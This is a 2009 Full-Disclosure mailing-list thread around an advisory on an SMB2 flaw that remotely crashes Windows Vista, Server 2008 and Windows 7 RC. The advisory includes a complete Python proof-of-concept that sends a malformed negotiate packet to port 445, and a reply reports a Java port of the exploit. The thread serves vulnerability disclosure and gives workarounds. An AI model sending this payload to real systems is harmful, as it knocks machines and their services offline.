It's fun :-)
On Mon, September 14, 2009 12:14 pm, D-vice wrote: > You wrote an exploit in java.... > > > *head explodes* > > On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux > <ra...@procyonlabs.com>wrote: > >> After testing my version of the exploit (using Java instead of Python) I >> tried it against a Windows Server 2008 R2 installation - it went down. >> >> http://www.procyonlabs.com/software/smb2_bsoder >> >> Randy >> >> >> laurent gaffie wrote: >> > Advisory updated : >> > >> > >> > ============================================= >> > - Release date: September 7th, 2009 >> > - Discovered by: Laurent GaffiƩ >> > - Severity: High >> > ============================================= >> > >> > I. VULNERABILITY >> > ------------------------- >> > Windows Vista, Server 2008 < R2, 7 RC : >> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. >> > >> > II. BACKGROUND >> > ------------------------- >> > Windows vista and newer Windows comes with a new SMB version named >> SMB2. >> > See: >> > >> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 >> > for more details. >> > >> > III. DESCRIPTION >> > ------------------------- >> > [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS >> > patch, for another SMB2.0 security issue: >> > KB942624 (MS07-063) >> > Installing only this specific update on Vista SP0 create the following >> > issue: >> > >> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE >> > PROTOCOL REQUEST functionnality. >> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to >> a >> > SMB server, and it's used to identify the SMB dialect that will be >> used >> > for futher communication. >> > >> > IV. PROOF OF CONCEPT >> > ------------------------- >> > >> > Smb-Bsod.py: >> > >> > #!/usr/bin/python >> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header >> field >> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error >> > >> > from socket import socket >> > >> > host = "IP_ADDR", 445 >> > buff = ( >> > "\x00\x00\x00\x90" # Begin SMB header: Session message >> > "\xff\x53\x4d\x42" # Server Component: SMB >> > "\x72\x00\x00\x00" # Negociate Protocol >> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 >> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" >> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" >> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" >> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" >> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" >> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" >> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" >> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" >> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" >> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" >> > "\x30\x30\x32\x00" >> > ) >> > s = socket() >> > s.connect(host) >> > s.send(buff) >> > s.close() >> > >> > V. BUSINESS IMPACT >> > ------------------------- >> > An attacker can remotly crash any Vista/Windows 7 machine with SMB >> enable. >> > Windows Xp, 2k, are NOT affected as they dont have this driver. >> > >> > VI. SYSTEMS AFFECTED >> > ------------------------- >> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server >> 2008 >> > < R2, Windows 7 RC. >> > >> > VII. SOLUTION >> > ------------------------- >> > No patch available for the moment. >> > Close SMB feature and ports, until a patch is provided. >> > Configure your firewall properly >> > You can also follow the MS Workaround: >> > http://www.microsoft.com/technet/security/advisory/975497.mspx >> > >> > VIII. REFERENCES >> > ------------------------- >> > http://www.microsoft.com/technet/security/advisory/975497.mspx >> > >> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx >> > >> > IX. CREDITS >> > ------------------------- >> > This vulnerability has been discovered by Laurent GaffiƩ >> > Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com> >> > >> > X. REVISION HISTORY >> > ------------------------- >> > September 7th, 2009: Initial release >> > September 11th, 2009: Revision 1.0 release >> > >> > XI. LEGAL NOTICES >> > ------------------------- >> > The information contained within this advisory is supplied "as-is" >> > with no warranties or guarantees of fitness of use or otherwise. >> > I accept no responsibility for any damage caused by the use or >> > misuse of this information. >> > >> > XII.Personal Notes >> > ------------------------- >> > Many persons have suggested to update this advisory for RCE and not >> BSOD: >> > It wont be done, if they find a way to execute code, they will publish >> > them advisory. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
